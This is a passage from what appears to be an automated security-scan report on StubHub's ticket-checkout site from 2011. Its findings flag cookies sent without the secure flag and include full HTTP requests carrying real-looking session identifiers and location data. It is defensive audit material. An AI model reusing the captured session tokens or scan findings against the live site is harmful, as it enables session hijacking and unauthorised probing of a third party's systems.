STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:54 GMT
Server: Apache
Set-Cookie: TLTHID=E472A54439C1103903BEE205A91C2150; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 2f05#19ad/checkout/services/reviewSubmit@srwp01byx005.stubprod.com
com-stubhub-dye: 2f05#19ad/checkout/services/reviewSubmit@srwp01byx005.stubprod.com
Location: https://myaccount.stubhub.com/login/Signin
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


2.11. https://buy.stubhub.com/help/services/popUp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /help/services/popUp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/services/popUp HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:43:10 GMT
Server: Apache
Set-Cookie: TLTHID=EE39049C39C11039003090BE30AA5CCD; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: eaed#e752/help/services/popUp@srwp01myx005.stubprod.com
com-stubhub-dye: eaed#e752/help/services/popUp@srwp01myx005.stubprod.com
Set-Cookie: JSESSIONID=96F40F445A335AAA72307D9D93536BAD; Path=/; Secure
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Location: https://buy.stubhub.com/errorAjax.html
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


2.12. https://buy.stubhub.com/howToEnableJavaScript.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /howToEnableJavaScript.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /howToEnableJavaScript.html HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:42:54 GMT
Server: Apache
Set-Cookie: TLTHID=E4A3421C39C1103978D494000C1CF856; Path=/; Domain=.stubhub.com
Last-Modified: Tue, 16 Feb 2010 20:48:57 GMT
Accept-Ranges: bytes
Content-Length: 1064
Vary: Accept-Encoding
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>How to enable JavaScript</title>
<style
...[SNIP]...

2.13. https://buy.stubhub.com/modules/js/referdetect.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /modules/js/referdetect.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /modules/js/referdetect.js HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Tue, 17 Oct 2006 21:47:35 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Wed, 16 Feb 2011 12:12:18 GMT
Cache-Control: max-age=1800
Vary: Accept-Encoding
Set-Cookie: TLTHID=CEDDB7AA39C110393178904AB7E84BF7; Path=/; Domain=.stubhub.com


2.14. https://buy.stubhub.com/promotions/scratch/JS/myaccount-beta-perf-url-scraping-content-1.0.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/JS/myaccount-beta-perf-url-scraping-content-1.0.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/JS/myaccount-beta-perf-url-scraping-content-1.0.js HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Thu, 16 Sep 2010 00:19:32 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Wed, 16 Feb 2011 12:12:18 GMT
Cache-Control: max-age=1800
Vary: Accept-Encoding
Set-Cookie: TLTHID=CEDFB4A639C110397CCC904C887D2E22; Path=/; Domain=.stubhub.com


2.15. https://buy.stubhub.com/promotions/scratch/foresee/foresee-analytics-bottom-e9f04.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/foresee/foresee-analytics-bottom-e9f04.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/foresee/foresee-analytics-bottom-e9f04.js HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Wed, 26 Jan 2011 22:59:58 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe 